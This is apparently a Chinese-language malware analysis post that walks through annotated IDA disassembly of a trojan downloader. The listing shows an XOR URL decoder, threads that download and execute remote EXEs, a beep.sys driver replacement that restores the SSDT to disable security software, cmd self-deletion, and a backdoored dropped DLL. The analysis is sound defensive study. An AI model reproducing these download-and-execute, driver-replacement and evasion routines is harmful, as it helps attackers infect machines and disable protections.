unpacked:004022ED          push 0FFFFFF34h ; Offset
unpacked:004022F2          push ebx       ; File
unpacked:004022F3          call esi ; fseek
unpacked:004022F5          push ebx       ; File
unpacked:004022F6          push 1          ; Count
unpacked:004022F8          lea eax,
unpacked:004022FB          push 1          ; ElementSize
unpacked:004022FD          push eax       ; DstBuf
unpacked:004022FE          call edi ; fread
unpacked:00402300          add esp, 28h
unpacked:00402303          test eax, eax
unpacked:00402305          jnz short loc_40230E
unpacked:00402307          push offset aFopenCannTRe_2 ; "fopen cann't read data.. /delself "
unpacked:0040230C          jmp short loc_402384
unpacked:0040230E ; ---------------------------------------------------------------------------
unpacked:0040230E
unpacked:0040230E loc_40230E:                ; CODE XREF: Read_Overlay+1F1j
unpacked:0040230E          cmp , 59h
unpacked:00402312          push 6Dh       ; Size
unpacked:00402314          push 0          ; Val
unpacked:00402316          setz al
unpacked:00402319          mov byte_404A09, al
unpacked:0040231E          lea eax,
unpacked:00402321          push eax       ; Dst
unpacked:00402322          call memset
unpacked:00402327          push 2          ; Origin
unpacked:00402329          push 0FFFFFF35h ; Offset
unpacked:0040232E          push ebx       ; File
unpacked:0040232F          call esi ; fseek
unpacked:00402331          push ebx       ; File
unpacked:00402332          push 1          ; Count
unpacked:00402334          lea eax,
unpacked:00402337          push 1          ; ElementSize
unpacked:00402339          push eax       ; DstBuf
unpacked:0040233A          call edi ; fread
unpacked:0040233C          add esp, 28h
unpacked:0040233F          test eax, eax
unpacked:00402341          jnz short loc_40234A
unpacked:00402343          push offset aFopenCannTRe_3 ; "fopen cann't read data.. /isWebGet "
unpacked:00402348          jmp short loc_402384
unpacked:0040234A ; ---------------------------------------------------------------------------
unpacked:0040234A
unpacked:0040234A loc_40234A:                ; CODE XREF: Read_Overlay+22Dj
unpacked:0040234A          cmp , 59h
unpacked:0040234E          push 6Dh       ; Size
unpacked:00402350          push 0          ; Val
unpacked:00402352          setz al
unpacked:00402355          mov byte_404A08, al
unpacked:0040235A          lea eax,
unpacked:0040235D          push eax       ; Dst
unpacked:0040235E          call memset
unpacked:00402363          push 2          ; Origin
unpacked:00402365          push 0FFFFFF36h ; Offset
unpacked:0040236A          push ebx       ; File
unpacked:0040236B          call esi ; fseek
unpacked:0040236D          push ebx       ; File
unpacked:0040236E          push 1          ; Count
unpacked:00402370          lea eax,
unpacked:00402373          push 6Dh       ; ElementSize
unpacked:00402375          push eax       ; DstBuf
unpacked:00402376          call edi ; fread
unpacked:00402378          add esp, 28h
unpacked:0040237B          test eax, eax
unpacked:0040237D          jnz short loc_40238E
unpacked:0040237F          push offset aFopenCannTRe_4 ; "fopen cann't read data.. /szURL "
unpacked:00402384
unpacked:00402384 loc_402384:                ; CODE XREF: Read_Overlay+3Fj
unpacked:00402384                            ; Read_Overlay+63j
unpacked:00402384                            ; Read_Overlay+A3j
unpacked:00402384                            ; Read_Overlay+12Fj
unpacked:00402384                            ; Read_Overlay+17Aj
unpacked:00402384                            ; Read_Overlay+1B9j
unpacked:00402384                            ; Read_Overlay+1F8j
unpacked:00402384                            ; Read_Overlay+234j
unpacked:00402384          call OutputDebugStringA
unpacked:0040238A          xor al, al
unpacked:0040238C          jmp short loc_4023A8
unpacked:0040238E ; ---------------------------------------------------------------------------
unpacked:0040238E
unpacked:0040238E loc_40238E:                ; CODE XREF: Read_Overlay+269j
unpacked:0040238E          lea eax,
unpacked:00402391          push eax
unpacked:00402392          push offset byte_4049A4
unpacked:00402397          call _mbscpy
unpacked:0040239C          push ebx       ; File
unpacked:0040239D          call fclose
unpacked:004023A3          add esp, 0Ch
unpacked:004023A6          mov al, 1
unpacked:004023A8
unpacked:004023A8 loc_4023A8:                ; CODE XREF: Read_Overlay+278j
unpacked:004023A8          pop edi
unpacked:004023A9          pop esi
unpacked:004023AA          pop ebx
unpacked:004023AB          leave
unpacked:004023AC          retn
unpacked:004023AC Read_Overlay endp

//URL解密call
unpacked:00401ED7 DecodeURL proc near       ; CODE XREF: WinMain(x,x,x,x)+239p
unpacked:00401ED7
unpacked:00401ED7 str       = dword ptr4
unpacked:00401ED7 key       = byte ptr8
unpacked:00401ED7
unpacked:00401ED7          push esi
unpacked:00401ED8          mov esi,
unpacked:00401EDC          xor edx, edx
unpacked:00401EDE          mov al,
unpacked:00401EE0          test al, al
unpacked:00401EE2          jzshort loc_401EF9
unpacked:00401EE4          mov ecx, esi
unpacked:00401EE6
unpacked:00401EE6 loc_401EE6:                ; CODE XREF: DecodeURL+20j
unpacked:00401EE6          sub al, dl
unpacked:00401EE8          xor al, ; 简单的异或解密(或加密).
unpacked:00401EEC          inc edx
unpacked:00401EED          mov , al
unpacked:00401EEF          mov al,
unpacked:00401EF2          lea ecx,
unpacked:00401EF5          test al, al
unpacked:00401EF7          jnz short loc_401EE6 ; 遇'\0'结束 .
unpacked:00401EF9
unpacked:00401EF9 loc_401EF9:                ; CODE XREF: DecodeURL+Bj
unpacked:00401EF9          mov eax, esi
unpacked:00401EFB          pop esi
unpacked:00401EFC          retn
unpacked:00401EFC DecodeURL endp

//线程函数,为每个下载地址单独建立一个线程
unpacked:004019ED ; 线程函数, 对于每个远程exe url建立一个线程进行下载并执行.
unpacked:004019ED ; Attributes: bp-based frame
unpacked:004019ED
unpacked:004019ED ; DWORD __stdcall ThreadProc(LPVOID)
unpacked:004019ED ThreadProcproc near       ; DATA XREF: WinMain(x,x,x,x)+37Fo
unpacked:004019ED
unpacked:004019ED DownAddr = byte ptr -104h
unpacked:004019ED lpOutputString= dword ptr8
unpacked:004019ED
unpacked:004019ED          push ebp
unpacked:004019EE          mov ebp, esp
unpacked:004019F0          sub esp, 104h
unpacked:004019F6          push esi
unpacked:004019F7          push edi
unpacked:004019F8          xor edi, edi
unpacked:004019FA          push 104h       ; Size
unpacked:004019FF          lea eax, ; 这个事下载的地址, 由CreateThread作为参数传件来的.
unpacked:00401A05          push edi       ; Val
unpacked:00401A06          push eax       ; Dst
unpacked:00401A07          call memset
unpacked:00401A0C          lea eax,
unpacked:00401A12          push offset aCProgra1 ; "c:\\Progra~1\\"
unpacked:00401A17          push eax
unpacked:00401A18          call _mbscpy
unpacked:00401A1D          add esp, 14h
unpacked:00401A20          push 9          ; Count
unpacked:00401A22          call GetRandomStr ; 得到一个随机的文件名.
unpacked:00401A27          push eax       ; Source
unpacked:00401A28          lea eax,
unpacked:00401A2E          push eax       ; Dest
unpacked:00401A2F          call strncat
unpacked:00401A35          lea eax,
unpacked:00401A3B          push offset a_exe ; ".exe"
unpacked:00401A40          push eax
unpacked:00401A41          call _mbscat    ; 连上".exe"后缀.
unpacked:00401A46          mov esi, OutputDebugStringA
unpacked:00401A4C          add esp, 14h
unpacked:00401A4F          push ; lpOutputString
unpacked:00401A52          call esi ; OutputDebugStringA
unpacked:00401A54          lea eax,
unpacked:00401A5A          push eax       ; lpOutputString
unpacked:00401A5B          call esi ; OutputDebugStringA
unpacked:00401A5D          push edi       ; LPBINDSTATUSCALLBACK
unpacked:00401A5E          lea eax,
unpacked:00401A64          push edi       ; DWORD
unpacked:00401A65          push eax       ; LPCSTR
unpacked:00401A66          push ; LPCSTR
unpacked:00401A69          push edi       ; LPUNKNOWN
unpacked:00401A6A          call URLDownloadToFileA ; 下载文件.
unpacked:00401A6F          push edi       ; nShowCmd
unpacked:00401A70          push edi       ; lpDirectory
unpacked:00401A71          lea eax,
unpacked:00401A77          push edi       ; lpParameters
unpacked:00401A78          push eax       ; lpFile
unpacked:00401A79          push offset Operation ; "open"
unpacked:00401A7E          push edi       ; hwnd
unpacked:00401A7F          call ShellExecuteA ; 执行EXE文件.
unpacked:00401A85          lea eax,
unpacked:00401A8B          push eax       ; lpFileName
unpacked:00401A8C          call DeleteFileA
unpacked:00401A92          pop edi
unpacked:00401A93          xor eax, eax
unpacked:00401A95          pop esi
unpacked:00401A96          leave
unpacked:00401A97          retn 4
unpacked:00401A97 ThreadProcendp

//随机字符串生成call(用于命名下载后的exe文件)
unpacked:00401962 ; 返回一个随机字符串,在OD中看效果.
unpacked:00401962
unpacked:00401962 GetRandomStr proc near    ; CODE XREF: ThreadProc+35p
unpacked:00401962          push ebx
unpacked:00401963          push esi
unpacked:00401964          push edi
unpacked:00401965          call timeGetTime; 做种子.
unpacked:0040196B          push eax       ; Seed
unpacked:0040196C          call srand
unpacked:00401972          mov ebx, rand
unpacked:00401978          call ebx ; rand
unpacked:0040197A          push 0Ah       ; %10 , 控制随机数在0到9之间.
unpacked:0040197C          cdq
unpacked:0040197D          pop ecx
unpacked:0040197E          idiv ecx
unpacked:00401980          inc edx
unpacked:00401981
unpacked:00401981 loc_401981:                ; DATA XREF: unpacked:0040A0EBo
unpacked:00401981          push edx       ; unsigned int
unpacked:00401982          call ??2@YAPAXI@Z ; operator new(uint)
unpacked:00401987          pop ecx
unpacked:00401988          mov edi, eax
unpacked:0040198A          pop ecx
unpacked:0040198B
unpacked:0040198B loc_40198B:                ; DATA XREF: unpacked:0040A0EFo
unpacked:0040198B          xor esi, esi
unpacked:0040198D
unpacked:0040198D loc_40198D:                ; CODE XREF: GetRandomStr+47j
unpacked:0040198D          call ebx ; rand
unpacked:0040198F          push 34h
unpacked:00401991          cdq
unpacked:00401992          pop ecx
unpacked:00401993          idiv ecx
unpacked:00401995          cmp edx, 1Ah    ; 除以52的余数在和26判断.
unpacked:00401998          jge short loc_40199F
unpacked:0040199A          add dl, 41h    ; 小于26则加'A'
unpacked:0040199D          jmp short loc_4019A2
unpacked:0040199F ; ---------------------------------------------------------------------------
unpacked:0040199F
unpacked:0040199F loc_40199F:                ; CODE XREF: GetRandomStr+36j
unpacked:0040199F          add dl, 47h    ; 这里其实是这样的:-6 + 'a' . 他的目的是为了生成字母.
unpacked:004019A2
unpacked:004019A2 loc_4019A2:                ; CODE XREF: GetRandomStr+3Bj
unpacked:004019A2          mov , dl
unpacked:004019A5          inc esi
unpacked:004019A6          cmp esi, 9
unpacked:004019A9          jlshort loc_40198D
unpacked:004019AB          mov eax, edi
unpacked:004019AD          pop edi
unpacked:004019AE          pop esi
unpacked:004019AF          pop ebx
unpacked:004019B0          retn
unpacked:004019B0 GetRandomStr endp

//恢复SSDT
unpacked:00401927
unpacked:00401927 ; int __cdecl Start_ReSSDT(HMODULE hModule)
unpacked:00401927 Start_ReSSDT proc near    ; CODE XREF: WinMain(x,x,x,x)+8Dp
unpacked:00401927
unpacked:00401927 var_8    = dword ptr -8
unpacked:00401927 hModule = dword ptr4
unpacked:00401927
unpacked:00401927          push esi
unpacked:00401928          push ; hModule
unpacked:0040192C          call LoadDriver ; 第一步:加载驱动.
unpacked:00401931          mov esi, eax
unpacked:00401933          pop ecx
unpacked:00401934
unpacked:00401934 loc_401934:                ; DATA XREF: unpacked:0040A0E7o
unpacked:00401934          cmp esi, 0FFFFFFFFh
unpacked:00401937          jnz short loc_401950
unpacked:00401939          push eax       ; NumberOfBytesWritten
unpacked:0040193A          call UnLoadDriver
unpacked:0040193F          mov , offset aLoaddriverFail ; "LoadDriver failed -- hDriver null || in"...
unpacked:00401946          call OutputDebugStringA
unpacked:0040194C          xor al, al
unpacked:0040194E          pop esi
unpacked:0040194F          retn
unpacked:00401950 ; ---------------------------------------------------------------------------
unpacked:00401950
unpacked:00401950 loc_401950:                ; CODE XREF: Start_ReSSDT+10j
unpacked:00401950          push esi       ; hDevice
unpacked:00401951          call ReSSDT    ; 关键函数
unpacked:00401956          push esi       ; NumberOfBytesWritten
unpacked:00401957          call UnLoadDriver ; 第三步:卸载驱动. 上面就是最重要的恢复.
unpacked:0040195C          pop ecx
unpacked:0040195D          mov al, 1
unpacked:0040195F          pop ecx
unpacked:00401960          pop esi
unpacked:00401961          retn
unpacked:00401961 Start_ReSSDT endp
unpacked:00401961

//来看下里面的关键函数ReSSDT:
unpacked:004013C1
unpacked:004013C1 ; 这个函数某些部分我还不是很懂, 不过肯定是恢复SSDT表这是没错的,
unpacked:004013C1 ; 貌似是这样的过程:(不当之处谢谢指正.)
unpacked:004013C1 ; 从ntdll中得到NtQuerySystemInformation函数的地址,然后进行一些查询
unpacked:004013C1 ; 工作确定系统类型, 再使用LoadlibraryEx装载适当的核心文件
unpacked:004013C1 ; (如ntoskrnl.exe),因为静态物理文件是干净的,没有被Hook的. 然后得到
unpacked:004013C1 ; 其被导出的符号keServiceDecriptor的地址, 再减去其装载基址,即可得
unpacked:004013C1 ; 到偏移,通过这个偏移即可定位到原SSDT表,然后使用文件中的SSDT表对
unpacked:004013C1 ; 被Hook了的SSDT表进行恢复.
unpacked:004013C1 ; Attributes: bp-based frame
unpacked:004013C1
unpacked:004013C1 ; int __cdecl ReSSDT(HANDLE hDevice)
unpacked:004013C1 ReSSDT    proc near       ; CODE XREF: Start_ReSSDT+2Ap
unpacked:004013C1
unpacked:004013C1 var_20    = byte ptr -20h
unpacked:004013C1 var_1C    = byte ptr -1Ch
unpacked:004013C1 BytesReturned= dword ptr -18h
unpacked:004013C1 var_14    = dword ptr -14h
unpacked:004013C1 var_10    = dword ptr -10h
unpacked:004013C1 dwBytes = dword ptr -0Ch
unpacked:004013C1 InBuffer = byte ptr -8
unpacked:004013C1 hMem    = dword ptr -4
unpacked:004013C1 hDevice = dword ptr8
unpacked:004013C1
unpacked:004013C1          push ebp
unpacked:004013C2          mov ebp, esp
unpacked:004013C4          sub esp, 20h
unpacked:004013C7          push ebx
unpacked:004013C8          push esi
unpacked:004013C9          push edi
unpacked:004013CA          lea eax,
unpacked:004013CD          xor ebx, ebx
unpacked:004013CF          push offset ProcName ; "NtQuerySystemInformation"
unpacked:004013D4          push offset ModuleName ; "ntdll.dll"
unpacked:004013D9          mov , eax
unpacked:004013DC          mov dword ptr , ebx
unpacked:004013DF          call GetModuleHandleA
unpacked:004013E5          mov esi, GetProcAddress
unpacked:004013EB          push eax       ; hModule
unpacked:004013EC          call esi ; GetProcAddress
unpacked:004013EE          mov edi, eax    ; 这里得到NtQuerySystemInformation的地址.
unpacked:004013F0          cmp edi, ebx
unpacked:004013F2          jnz short loc_4013FE
unpacked:004013F4          push offset aError_info ; "NtQuerySystemInformationAddr =NULL ."
unpacked:004013F9          jmp loc_4014F3
unpacked:004013FE ; ---------------------------------------------------------------------------
unpacked:004013FE
unpacked:004013FE loc_4013FE:                ; CODE XREF: ReSSDT+31j
unpacked:004013FE          lea eax,
unpacked:00401401          push eax
unpacked:00401402          push 4
unpacked:00401404          push
unpacked:00401407          push 0Bh
unpacked:00401409          call edi       ; call NtQuerySystemInformation.
unpacked:0040140B          cmp eax, 0C0000004h
unpacked:00401410          jnz loc_4014EE
unpacked:00401416          push ; dwBytes
unpacked:00401419          push 40h       ; uFlags
unpacked:0040141B          call GlobalAlloc
unpacked:00401421          push ebx
unpacked:00401422          mov , eax
unpacked:00401425          push
unpacked:00401428
unpacked:00401428 loc_401428:                ; DATA XREF: unpacked:004121C4o
unpacked:00401428          push eax
unpacked:00401429          push 0Bh
unpacked:0040142B          call edi
unpacked:0040142D          test eax, eax
unpacked:0040142F          jge short loc_40143B
unpacked:00401431          push offset aNt_successRcRe ; "NT_SUCCESS(rc) return False"
unpacked:00401436          jmp loc_4014F3
unpacked:0040143B ; ---------------------------------------------------------------------------
unpacked:0040143B
unpacked:0040143B loc_40143B:                ; CODE XREF: ReSSDT+6Ej
unpacked:0040143B          mov eax,
unpacked:0040143E          push 1          ; dwFlags
unpacked:00401440          push ebx       ; hFile
unpacked:00401441          mov ecx,
unpacked:00401444          mov , ecx
unpacked:00401447          movzx ecx, word ptr
unpacked:0040144B          lea eax,
unpacked:0040144F          push eax       ; lpLibFileName
unpacked:00401450          call LoadLibraryExA
unpacked:00401456          mov edi, eax
unpacked:00401458          cmp edi, ebx
unpacked:0040145A          jnz short loc_401466
unpacked:0040145C          push offset aHkernelNull_ ; "hKernel Null ."
unpacked:00401461          jmp loc_4014F3
unpacked:00401466 ; ---------------------------------------------------------------------------
unpacked:00401466
unpacked:00401466 loc_401466:                ; CODE XREF: ReSSDT+99j
unpacked:00401466          push ; hMem
unpacked:00401469          call GlobalFree
unpacked:0040146F          push offset aKeservicedescr ; "KeServiceDescriptorTable"
unpacked:00401474          push edi       ; hModule
unpacked:00401475          call esi ; GetProcAddress
unpacked:00401477          cmp eax, ebx
unpacked:00401479          jnz short loc_401482
unpacked:0040147B          push offset aGetKeservicede ; "Get KeServiceDescriptorTable addr falie"...
unpacked:00401480          jmp short loc_4014F3
unpacked:00401482 ; ---------------------------------------------------------------------------
unpacked:00401482
unpacked:00401482 loc_401482:                ; CODE XREF: ReSSDT+B8j
unpacked:00401482          sub eax, edi
unpacked:00401484          push eax
unpacked:00401485          push edi
unpacked:00401486          call FindKiServiceTable ; 这个函数看起来乱七八糟的,不知道在干什么,不过从交叉参考处的
unpacked:00401486                            ; 注释会马上发现它是在找KiServiceTable的地址.而且是通过返回值
unpacked:00401486                            ; 来传递KiServiceTable地址.
unpacked:0040148B          mov esi, eax
unpacked:0040148D          pop ecx
unpacked:0040148E          cmp esi, ebx
unpacked:00401490          pop ecx
unpacked:00401491          jnz short loc_40149A
unpacked:00401493          push offset aFindkiservicet ; "FindKiServiceTable falied."
unpacked:00401498          jmp short loc_4014F3
unpacked:0040149A ; ---------------------------------------------------------------------------
unpacked:0040149A
unpacked:0040149A loc_40149A:                ; CODE XREF: ReSSDT+D0j
unpacked:0040149A          lea eax,
unpacked:0040149D          push eax
unpacked:0040149E          lea eax,
unpacked:004014A1          push eax
unpacked:004014A2          lea eax,
unpacked:004014A5          push eax
unpacked:004014A6          push edi
unpacked:004014A7          call Get_PE_Headers ; 得到PE驱动文件的PE头及区段表的相关信息.
unpacked:004014AC          add esp, 10h
unpacked:004014AF          add esi, edi
unpacked:004014B1
unpacked:004014B1 loc_4014B1:                ; CODE XREF: ReSSDT+122j
unpacked:004014B1          mov edx,
unpacked:004014B4          mov ecx,
unpacked:004014B6          mov ebx, ecx
unpacked:004014B8          sub ebx,
unpacked:004014BB          lea eax,
unpacked:004014BE          cmp ebx,
unpacked:004014C1          jnb short loc_4014E5
unpacked:004014C3          sub ecx,
unpacked:004014C5          lea eax,
unpacked:004014C8          push eax       ; LPVOID
unpacked:004014C9          push dword ptr ; char
unpacked:004014CC          add ecx,
unpacked:004014CF          push ; hDevice
unpacked:004014D2          mov , ecx
unpacked:004014D5          call ResetServiceAddr ; 这个用于对某一个被HOOK了的服务函数进行恢复的.
unpacked:004014DA          add esp, 0Ch
unpacked:004014DD          add esi, 4
unpacked:004014E0          inc dword ptr
unpacked:004014E3          jmp short loc_4014B1
unpacked:004014E5 ; ---------------------------------------------------------------------------
unpacked:004014E5
unpacked:004014E5 loc_4014E5:                ; CODE XREF: ReSSDT+100j
unpacked:004014E5          push edi       ; hLibModule
unpacked:004014E6          call FreeLibrary
unpacked:004014EC          jmp short loc_4014F9
unpacked:004014EE ; ---------------------------------------------------------------------------
unpacked:004014EE
unpacked:004014EE loc_4014EE:                ; CODE XREF: ReSSDT+4Fj
unpacked:004014EE          push offset aRcStatus_info_ ; "rc!=STATUS_INFO_LENGTH_MISMATCH."
unpacked:004014F3
unpacked:004014F3 loc_4014F3:                ; CODE XREF: ReSSDT+38j
unpacked:004014F3                            ; ReSSDT+75j ReSSDT+A0j
unpacked:004014F3                            ; ReSSDT+BFj ReSSDT+D7j
unpacked:004014F3          call OutputDebugStringA
unpacked:004014F9
unpacked:004014F9 loc_4014F9:                ; CODE XREF: ReSSDT+12Bj
unpacked:004014F9          pop edi
unpacked:004014FA          pop esi
unpacked:004014FB          pop ebx
unpacked:004014FC          leave
unpacked:004014FD          retn
unpacked:004014FD ReSSDT    endp

//我们来看下加载驱动的部分. (作者使用的是被用烂了的驱动替换)
unpacked:004016F7          push ebp
unpacked:004016F8          mov ebp, esp
unpacked:004016FA          sub esp, 138h
unpacked:00401700          and byte_404B80, 0
unpacked:00401707          and , 0
unpacked:0040170B          push esi
unpacked:0040170C          push edi
unpacked:0040170D          push offset ServiceName ; lpServiceName
unpacked:00401712          mov ServiceName, 42h
unpacked:00401719          mov byte_404B7D, 65h
unpacked:00401720          mov byte_404B7E, 65h
unpacked:00401727          mov byte_404B7F, 70h ; 这里是"Beep"
unpacked:0040172E          mov , 5Ch
unpacked:00401732          mov , 44h
unpacked:00401736          mov , 72h
unpacked:0040173A          mov , 69h
unpacked:0040173E          mov , 76h
unpacked:00401742          mov , 65h
unpacked:00401746          mov , 72h
unpacked:0040174A          mov , 73h
unpacked:0040174E          mov , 5Ch ; 这些mov其实是赋值字符串.这里是Drivers\beep.sys,
unpacked:0040174E                            ; 显然为臭名昭著的驱动替换.这样在代码中赋值字符串
unpacked:0040174E                            ; 可以起到一定得免杀作用.
unpacked:0040174E                            ;
unpacked:00401752          mov , 62h
unpacked:00401756          mov , 65h
unpacked:0040175A          mov , 65h
unpacked:0040175E          mov , 70h
unpacked:00401762          mov , 2Eh
unpacked:00401766          mov , 73h
unpacked:0040176A          mov , 79h
unpacked:0040176E          mov , 73h
unpacked:00401772          call StopService; 停止原来的系统服务, 因为要进行肮脏的驱动替换.
unpacked:00401777          test al, al
unpacked:00401779          pop ecx
unpacked:0040177A          jnz short loc_40178F
unpacked:0040177C          push offset aStopserviceFai ; "StopService failed in LoadDirv."
unpacked:00401781          call OutputDebugStringA
unpacked:00401787          oreax, 0FFFFFFFFh
unpacked:0040178A          jmp loc_4018AC
unpacked:0040178F ; ---------------------------------------------------------------------------
unpacked:0040178F
unpacked:0040178F loc_40178F:                ; CODE XREF: LoadDriver+83j
unpacked:0040178F          and , 0
unpacked:00401796          push ebx
unpacked:00401797          push 40h
unpacked:00401799          xor eax, eax
unpacked:0040179B          pop ecx
unpacked:0040179C          lea edi,
unpacked:004017A2          rep stosd
unpacked:004017A4          stosw
unpacked:004017A6          stosb
unpacked:004017A7          mov edi, GetSystemDirectoryA
unpacked:004017AD          mov esi, 104h
unpacked:004017B2          lea eax,
unpacked:004017B8          push esi       ; uSize
unpacked:004017B9          push eax       ; lpBuffer
unpacked:004017BA          call edi ; GetSystemDirectoryA
unpacked:004017BC          lea eax,
unpacked:004017C2          push offset aDllcacheBeep_s ; "\\dllcache\\beep.sys"
unpacked:004017C7          push eax
unpacked:004017C8          call _mbscat
unpacked:004017CD          mov ebx, DeleteFileA
unpacked:004017D3          pop ecx
unpacked:004017D4          pop ecx
unpacked:004017D5          lea eax,
unpacked:004017DB          push eax       ; lpFileName
unpacked:004017DC          call ebx ; DeleteFileA ; 删掉dllcache中的备份文件 .防止替换失败. 原来dllcache这个目录里面还有备份.
unpacked:004017DE          push esi       ; Size
unpacked:004017DF          lea eax,
unpacked:004017E5          push 0          ; Val
unpacked:004017E7          push eax       ; Dst
unpacked:004017E8          call memset
unpacked:004017ED          add esp, 0Ch
unpacked:004017F0          lea eax,
unpacked:004017F6          push esi       ; uSize
unpacked:004017F7          push eax       ; lpBuffer
unpacked:004017F8          call GetWindowsDirectoryA
unpacked:004017FE          lea eax,
unpacked:00401804          push offset aDriverCacheI38 ; "\\Driver Cache\\i386\\driver.cab"
unpacked:00401809          push eax
unpacked:0040180A          call _mbscat
unpacked:0040180F          pop ecx
unpacked:00401810          lea eax,
unpacked:00401816          pop ecx
unpacked:00401817          push eax       ; lpFileName
unpacked:00401818          call ebx ; DeleteFileA ; 按程序的意图, 貌似这个driver.cab也备份了那个beep.sys
unpacked:0040181A          push esi       ; uSize
unpacked:0040181B          mov esi, offset FileName
unpacked:00401820          push esi       ; lpBuffer
unpacked:00401821          call edi ; GetSystemDirectoryA
unpacked:00401823          lea eax,
unpacked:00401826          push eax
unpacked:00401827          push esi
unpacked:00401828          call lstrcat
unpacked:0040182E          push 80h       ; dwFileAttributes
unpacked:00401833          push esi       ; lpFileName
unpacked:00401834          call SetFileAttributesA
unpacked:0040183A          push offset nNumberOfBytesToWrite ; NumberOfBytesRead
unpacked:0040183F          push esi       ; lpFileName
unpacked:00401840          call GetBufffromFile ; 文件数据读到一个缓冲区, 并返回指针.
unpacked:00401845          pop ecx
unpacked:00401846          xor edi, edi
unpacked:00401848          cmp nNumberOfBytesToWrite, edi
unpacked:0040184E          pop ecx
unpacked:0040184F          mov lpBuffer, eax
unpacked:00401854          pop ebx
unpacked:00401855          jzshort loc_401892
unpacked:00401857          push esi       ; lpFileName
unpacked:00401858          push offset aSys; "SYS"
unpacked:0040185D          push 87h       ; lpBuffer
unpacked:00401862          push ; hModule
unpacked:00401865          call ReleaseRes_2 ; 释放恶意驱动---以恢复SSDT
unpacked:0040186A          add esp, 10h
unpacked:0040186D          test eax, eax
unpacked:0040186F          jnz short loc_401878
unpacked:00401871          push offset aModifyfromreso ; "ModifyFromResource falied."
unpacked:00401876          jmp short loc_40188C
unpacked:00401878 ; ---------------------------------------------------------------------------
unpacked:00401878
unpacked:00401878 loc_401878:                ; CODE XREF: LoadDriver+178j
unpacked:00401878          push offset ServiceName ; lpServiceName
unpacked:0040187D          call StartService ; 替换完毕, 启动我们的服务, 准备恢复SSDT表.
unpacked:00401882          test al, al
unpacked:00401884          pop ecx
unpacked:00401885          jnz short loc_401896
unpacked:00401887          push offset aStartserviceFa ; "StartService failed in LoadDirv."
unpacked:0040188C
unpacked:0040188C loc_40188C:                ; CODE XREF: LoadDriver+17Fj
unpacked:0040188C          call OutputDebugStringA
unpacked:00401892
unpacked:00401892 loc_401892:                ; CODE XREF: LoadDriver+15Ej
unpacked:00401892          xor eax, eax
unpacked:00401894          jmp short loc_4018AC
unpacked:00401896 ; ---------------------------------------------------------------------------
unpacked:00401896
unpacked:00401896 loc_401896:                ; CODE XREF: LoadDriver+18Ej
unpacked:00401896          push edi       ; hTemplateFile
unpacked:00401897          push edi       ; dwFlagsAndAttributes
unpacked:00401898          push 3          ; dwCreationDisposition
unpacked:0040189A          push edi       ; lpSecurityAttributes
unpacked:0040189B          push edi       ; dwShareMode
unpacked:0040189C          push 0C0000000h ; dwDesiredAccess
unpacked:004018A1          push offset a_Ressdtdos ; "\\\\.\\RESSDTDOS"
unpacked:004018A6
unpacked:004018A6 loc_4018A6:                ; DATA XREF: unpacked:0040A0DFo
unpacked:004018A6          call CreateFileA; 打开设备.进行通信
... ...

-------------------------------------------------------------------------------------------------------------------------------
关于SSDT恢复部分的, 这里就不多贴了, 免得占版面. (我会在附件中打包idb文件)
我们再看其他的部分.
---------------
进程注射作者使用的是最简单的dll远程线程注射. 没什么新意, 我就不贴反汇编代码了.
自删除部分也是使用的最常用的方法,通过创建一个cmd进程,并设置进程优先级来达到目的. 如下:
... ...
unpacked:00401100          mov esi, 104h
unpacked:00401105          lea eax,
unpacked:0040110B          push esi       ; nSize
unpacked:0040110C          push eax       ; lpFilename
unpacked:0040110D          push 0          ; hModule
unpacked:0040110F          call GetModuleFileNameA
unpacked:00401115          test eax, eax
unpacked:00401117          jzloc_4011F4
unpacked:0040111D          lea eax,
unpacked:00401123          push esi       ; cchBuffer
unpacked:00401124          push eax       ; lpszShortPath
unpacked:00401125          lea eax,
unpacked:0040112B          push eax       ; lpszLongPath
unpacked:0040112C          call GetShortPathNameA
unpacked:00401132          test eax, eax
unpacked:00401134          jzloc_4011F4
unpacked:0040113A          lea eax,
unpacked:00401140          push esi       ; nSize
unpacked:00401141          push eax       ; lpBuffer
unpacked:00401142          push offset Name; "COMSPEC"
unpacked:00401147          call GetEnvironmentVariableA
unpacked:0040114D          test eax, eax
unpacked:0040114F          jzloc_4011F4
unpacked:00401155          lea eax,
unpacked:0040115B          push offset aCDel ; "/c del "
unpacked:00401160          push eax
unpacked:00401161          call lstrcpy
unpacked:00401167          mov esi, lstrcat
unpacked:0040116D          lea eax,
unpacked:00401173          push eax
unpacked:00401174          lea eax,
unpacked:0040117A          push eax
unpacked:0040117B          call esi ; lstrcat
unpacked:0040117D          lea eax,
unpacked:00401183          push offset aNul; " > nul"
unpacked:00401188          push eax
unpacked:00401189          call esi ; lstrcat
unpacked:0040118B          lea eax,
unpacked:00401191          and , 0
unpacked:00401195          and , 0
unpacked:00401199          and , 0
unpacked:0040119D          mov , eax
unpacked:004011A0          lea eax,
unpacked:004011A6          push 40h
unpacked:004011A8          mov , eax
unpacked:004011AB          pop esi
unpacked:004011AC          lea eax,
unpacked:004011AF          push eax
unpacked:004011B0          mov , 3Ch
unpacked:004011B7          mov , offset Operation ; "open"
unpacked:004011BE          mov , esi
unpacked:004011C1          call ShellExecuteEx
unpacked:004011C7          test eax, eax
unpacked:004011C9          jzshort loc_4011F4
unpacked:004011CB          push esi       ; dwPriorityClass
unpacked:004011CC          mov esi, SetPriorityClass
unpacked:004011D2          push ; hProcess
unpacked:004011D5          call esi ; SetPriorityClass
unpacked:004011D7          push 100h       ; dwPriorityClass
unpacked:004011DC          call GetCurrentProcess
unpacked:004011E2          push eax       ; hProcess
unpacked:004011E3          call esi ; SetPriorityClass
unpacked:004011E5          push 0Fh       ; nPriority
unpacked:004011E7          call GetCurrentThread
unpacked:004011ED          push eax       ; hThread
unpacked:004011EE          call SetThreadPriority
... ...

////释放出的dll分析:
dll中没什么代码, 只是简单地从自身文件尾读取配置信息, 并按照配置信息执行以下就完了, 不过比较有意思的是,
好像作者在dll中安置了一个貌似是后门的东西. 这作者人品也...

dll主要代码如下:
.text:100011E9       lea eax,
.text:100011F0       push eax       ; lpBuffer
.text:100011F1       call ds:GetWindowsDirectoryA ; 这里读取dll自身.
.text:100011F7       mov edi, offset aSystem32Ilovex ; "\\system32\\ilovexd.dll"
.text:100011FC       or    ecx, 0FFFFFFFFh
.text:100011FF       xor eax, eax
.text:10001201       lea edx,
.text:10001208       repne scasb
.text:1000120A       not ecx
.text:1000120C       sub edi, ecx
.text:1000120E       push offset Mode ; "rb"
.text:10001213       mov esi, edi
.text:10001215       mov ebx, ecx
.text:10001217       mov edi, edx
